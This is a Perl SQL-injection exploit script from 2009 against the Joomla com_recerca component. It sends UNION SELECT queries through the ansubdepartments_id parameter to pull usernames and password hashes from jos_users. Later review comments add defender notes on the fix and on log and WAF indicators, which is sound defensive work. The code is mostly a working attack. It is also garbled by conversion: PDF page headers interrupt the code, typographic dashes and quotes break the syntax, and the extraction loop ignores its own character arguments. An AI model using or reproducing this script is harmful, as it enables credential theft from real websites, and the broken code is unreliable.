Joomla Recerca component SQL Injection


1 #!/usr/bin/perl
2
3 #=========================== [ root@indonesiancoder.com $ ~] ===========================#
4 # [~] Joomla Components com_recerca (ansubdepartments_id) SQL Injection Vulnerability #
5 # [~] Author : Don Tukulesto #
6 # [~] Homepage : http://www.indonesiancoder.com #
7 # [~] Tune in : http://www.AntiSecradio.fm ( choose your weapon ) #
8 # [~] Gracias : IndonesianCoder.com − AntiSecurity.org − ServerIsDown.org − MainHack #
9 # [~] kaMtiEz, M3NW5, arianom, Jack−, Yadoy666, Gonzhack, SoulNet, s4va, tiw0L, Kill−9 #
10 # [~] SAINT, CYB3R_TR0N, M364TR0N, NoGe, TUCKER, Ian Petrucii, RoNz, Chercut, YOU !! #
11 #=========================== [ root@indonesiancoder.com $ ~] ===========================#
12
13
14 use HTTP::Request;
15 use LWP::UserAgent;
16
# Script-wide settings, all package globals (no `use strict` / `use warnings` in this file).
# $vuln is the path and query string every request is built on: Joomla's index.php with
# option=com_recerca, task=linia, and ansubdepartments_id as the parameter that receives
# the injected SQL.
# $column / $table name what the query reads: username and password joined by ':' (0x3a)
# from jos_users (the users table under Joomla's default jos_ prefix).
# The $column default set here is replaced by the operator-supplied list once get_data's
# foreach loop runs.
# $regexp is the response text get_data treats as "no match"; $maxlen caps its per-column loop.
#
# NOTE(review), defender's view: the vulnerable component code is not on this page;
# presumably it concatenates ansubdepartments_id into a SQL statement. The application-side
# fix is to cast that parameter to an integer or bind it as a query parameter. In web-server
# or WAF logs the indicator is a com_recerca request whose ansubdepartments_id value contains
# anything other than digits.
17 $cmsapp = ’Joomla Component com_recerca’;
18 $vuln = ’index.php?option=com_recerca&task=linia&ansubdepartments_id=’;
19 $column = ’concat(username,0x3a,password)tukulesto’;
20 $table = ’jos_users’;
21 $regexp = ’No elements defined’;
22 $maxlen = 65;
23
# Clear the terminal: $^O is the OS name, so `cls` on Windows and `clear` elsewhere.
24 my $OS = "$^O";
25 if ($OS eq ’MSWin32’) { system("cls"); } else { system("clear"); }
26
# Banner; $cmsapp is interpolated into the string.
27 printf "\n
28 $cmsapp
29 [x]====================================================[x]
30 | www[dot]IndonesianCoder[dot]com |
31 [x]====================================================[x]
32
33 \n";
34
# Operator input from STDIN: the site's base URL, an ansubdepartments_id value, and a
# comma-separated column list (split in get_data). None of the three is validated.
35 print " [~] URL Path : "; chomp($web=<STDIN>);
36 print " [~] Valid ID : "; chomp($id=<STDIN>);
37 print " [~] Column : "; chomp($columns=<STDIN>);
38
# Build $target with a trailing slash, prefixing http:// when the input does not contain it.
39 if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }
40
41 print "\n\n [!] Exploiting $target ...\n\n";
# get_data reads $columns, $web, $table, $maxlen and $regexp from the globals set above.
42 &get_data;
43 print "\n\n [!] Exploit completed.\n\n";
44
# get_data: for each operator-supplied column, run up to $maxlen rounds; in each round call
# exploit() once per candidate character code (48..90, then 97..122 if none matched) and
# echo the first code whose response body does NOT contain $regexp. A round in which the
# last code tried still matched $regexp ends the column.
# Takes no arguments and returns nothing useful; works on the script's globals.
#
# Defender's view: the URL built by exploit() depends only on $target, $vuln, $id, $column
# and $table, so within one column every request is the same GET. In access logs the run
# appears as a rapid burst of repeated requests carrying one union-select query string in
# ansubdepartments_id.
45 sub get_data() {
46 @columns = split(/,/, $columns);
# $column is the package global that exploit() reads; foreach sets it for each pass.
47 foreach $column (@columns) {
48 print " [exploiting\@$web] SELECT $column FROM $table please wait...\n";
# syswrite is used for unbuffered progress output on STDOUT.
49 syswrite(STDOUT, " [exploiting\@$web] $column\@$table > ", 255);
50 for (my $i=1; $i<=$maxlen; $i++) {
# $chr: a code was accepted this round. $found: the most recent test result.
51 my $chr = 0;
52 my $found = 1;
Don Tukulesto 10/07/2009
Joomla Recerca component SQL Injection Page 2/2
# First range: codes 48..90 ('0' through 'Z', including the punctuation in between).
53 my $char = 48;
54 while (!$chr && $char<=90) {
55 if(exploit($i,$char) !~ /$regexp/) {
56 $chr = 1;
57 $found = 1;
58 syswrite(STDOUT,chr($char),1);
59 } else { $found = 0; }
60 $char++;
61 }
# Second range, tried only when the first found nothing: codes 97..122 ('a'..'z').
62 if(!$chr) {
63 $char = 97;
64 while(!$chr && $char<=122) {
65 if(exploit($i,$char) !~ /$regexp/) {
66 $chr = 1;
67 $found = 1;
68 syswrite(STDOUT,chr($char),1);
69 } else { $found = 0; }
70 $char++;
71 }
72 }
# No candidate accepted in this round: finish the line and move to the next column.
73 if (!$found) {
74 print "\n"; last;
75 }
76 }
77 }
78 }
79
# exploit: build the request URL and return the response body from get_content().
# The URL is $target . $vuln . $id followed by a UNION SELECT of 24 columns with $column in
# the fourth position, reading from $table.
# NOTE(review): the trailing '−−' is presumably the SQL comment sequence as rendered by the
# document converter.
# The two arguments are copied into $limit and $chars but are not referenced again here.
#
# Defender's view: this string is what arrives in the ansubdepartments_id parameter, so
# "union", "select" and "from jos_users" in that parameter's value are the terms to match
# in a log search or WAF rule.
80 sub exploit() {
81 my $limit = $_[0];
82 my $chars = $_[1];
83 my $shits = ’+union+select+1,2,3,’.$column.’,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+’.$table.’−−’;
84 my $inject = $target.$vuln.$id.$shits;
85 my $content = get_content($inject);
86 return $content;
87 }
88
# get_content: issue one HTTP GET for the URL in $_[0] and return the response body.
# Creates a fresh LWP::UserAgent per call with a 15-second timeout. If the response is an
# error (is_error), prints the status line and exits the whole script.
#
# Defender's view: no agent string is set, so requests carry LWP's default User-Agent
# (libwww-perl/<version>), which is a useful filter when reviewing access logs for this
# traffic.
89 sub get_content() {
90 my $url = $_[0];
91 my $req = HTTP::Request−>new(GET => $url);
92 my $ua = LWP::UserAgent−>new();
93 $ua−>timeout(15);
94 my $res = $ua−>request($req);
95 if ($res−>is_error){
96 print "\n\n [!] Error, ".$res−>status_line.".\n\n";
97 exit;
98 }
99 return $res−>content;
100 }
Don Tukulesto 10/07/2009